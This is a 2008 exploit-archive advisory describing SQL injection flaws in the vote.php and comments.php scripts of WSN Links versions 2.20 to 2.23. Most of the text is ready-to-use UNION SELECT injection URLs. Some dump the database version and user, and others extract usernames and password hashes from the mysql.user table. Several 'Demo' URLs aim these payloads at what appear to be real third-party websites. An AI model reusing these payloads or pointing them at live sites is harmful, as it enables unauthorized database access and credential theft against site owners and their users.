wsnlinksvote-sql.txt

2008-09-22T00:00:00
ID PACKETSTORM:70198
Type packetstorm
Reporter d3v1l
Modified 2008-09-22T00:00:00

Description

                                        
                                            `1   
  
[~] WSN Links 2.23 AND 2.22 (vote.php) - SQL Injection Vulnerability  
[~]   
[~] http://scripts.webmastersite.net/wsnlinks/  
[~] ----------------------------------------------------------  
[~] Bug founded by d3v1l  
[~]   
[~] Date: 21.09.2008  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO:-  
[~]   
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]   
[~] Pentest|Gibon|Pig  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*  
[~]   
[~] Demo :-   
[~]   
[~] 2.22  
[~]   
[~] http://www.bujinkantrollhattan.com/scripts/wsnlinks/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*  
[~]   
[~] 2.23  
[~]   
[~] http://linkit.kalikos.org/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*  
[~]----------------------------------------------------------------------------------------------------------------------  
  
2   
  
[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability  
[~]   
[~] http://scripts.webmastersite.net/wsnlinks/  
[~] ----------------------------------------------------------  
[~] Bug founded by d3v1l  
[~]   
[~] Date: 21.09.2008  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO:-  
[~]   
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]   
[~] Pentest|Gibon|Pig  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*  
[~]   
[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*   
[~]   
[~]   
[~] Demo :-   
[~]  
[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*  
[~]   
[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*  
[~]   
[~]----------------------------------------------------------------------------------------------------------------------`